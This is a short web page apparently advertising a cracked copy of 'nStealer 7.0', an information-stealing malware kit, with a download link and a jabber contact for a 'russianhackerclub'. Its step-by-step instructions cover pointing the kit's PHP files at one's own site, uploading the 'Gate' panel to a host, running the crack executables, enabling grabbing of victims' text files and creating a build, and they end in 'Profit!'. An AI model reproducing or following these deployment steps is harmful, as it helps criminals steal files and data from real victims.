nStealer 7.0 Cracked

nStealer 7.0 Cracked


nStealer 7.0 Cracked
How to use:

[adinserter block=”1″]

  • Open config.php and change the password to your
  • Open gfiles.php and change the link to your site.
  • Open base.php and change the link to your site
  • Fill the contents of the Gate folder on the host
  • Run Crack-Xrรคck.exe and create config
  • Run nStealer Crack.exe
  • Activate grabbing files and enter at least one value “txt”
  • Create a build

Profit! ๐Ÿ˜€
[adinserter block=”1″]
Removed all the “knocks” on the left
Removed all downloads
Cleaned the styler ๐Ÿ˜€


jabber: russianhackerclub@jabber.ru

Download Link 1








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